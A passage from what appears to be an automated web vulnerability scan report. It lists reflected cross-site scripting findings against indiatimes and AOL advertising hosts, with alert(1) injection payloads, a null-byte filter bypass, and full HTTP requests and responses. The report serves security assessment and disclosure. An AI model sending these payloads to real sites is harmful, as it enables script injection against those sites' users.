GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICSf2ba3"><script>alert(1)</script>da433ca3c57/index.html/1982094345@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:42:04 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 369
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_TOPICSf2ba3"><script>alert(1)</script>da433ca3c57/index.html/906137717/Right1/default/empty.gif/33323137376236613465363266323830" target="_top">
...[SNIP]...

6.53. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ece0f"><script>alert(1)</script>278f26d0209 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.htmlece0f"><script>alert(1)</script>278f26d0209/1982094345@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:42:44 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 369
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_TOPICS/index.htmlece0f"><script>alert(1)</script>278f26d0209/599573279/Right1/default/empty.gif/33323137376236613465363266323830" target="_top">
...[SNIP]...

6.54. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00aceb6"-alert(1)-"3a68e560875 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aceb6"-alert(1)-"3a68e560875 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1?%00aceb6"-alert(1)-"3a68e560875=1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:12:20 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 2393
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html


...[SNIP]...

6.55. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/0/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4746"-alert(1)-"745afd83776 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /c4746"-alert(1)-"745afd83776/0/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:23 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/c4746"-alert(1)-"745afd83776/0/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.56. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/1/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 528e8"-alert(1)-"3333f1c57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /528e8"-alert(1)-"3333f1c57/1/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/528e8"-alert(1)-"3333f1c57/1/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.57. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/2/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7887"-alert(1)-"d9032cbe9c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /b7887"-alert(1)-"d9032cbe9c7/2/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b7887"-alert(1)-"d9032cbe9c7/2/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.58. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/3/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b55e7"-alert(1)-"119da7d957f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /b55e7"-alert(1)-"119da7d957f/3/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b55e7"-alert(1)-"119da7d957f/3/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.59. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/4/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 474b3"-alert(1)-"459125604c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /474b3"-alert(1)-"459125604c/4/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:36:23 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:36:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/474b3"-alert(1)-"459125604c/4/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.60. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/5/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4849"-alert(1)-"df23d7e0e6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /b4849"-alert(1)-"df23d7e0e6b/5/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b4849"-alert(1)-"df23d7e0e6b/5/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.61. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/6/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d039b"-alert(1)-"fcbdc04fa56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /d039b"-alert(1)-"fcbdc04fa56/6/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/d039b"-alert(1)-"fcbdc04fa56/6/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.62. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/7/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ddf0"-alert(1)-"f916ec34f60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /1ddf0"-alert(1)-"f916ec34f60/7/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:08 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/1ddf0"-alert(1)-"f916ec34f60/7/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.63. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/8/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbe48"-alert(1)-"7f3b58df0aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /fbe48"-alert(1)-"7f3b58df0aa/8/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/fbe48"-alert(1)-"7f3b58df0aa/8/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.64. http://advertising.aol.com/nai/nai.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/nai/nai.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c6dd"-alert(1)-"01757ed2f01 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai6c6dd"-alert(1)-"01757ed2f01/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:00:37 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:00:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai6c6dd"-alert(1)-"01757ed2f01/nai.php?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javas
...[SNIP]...

6.65. http://advertising.aol.com/nai/nai.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/nai/nai.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44bcc"-alert(1)-"bb366ec97aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nai/nai.php44bcc"-alert(1)-"bb366ec97aa?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
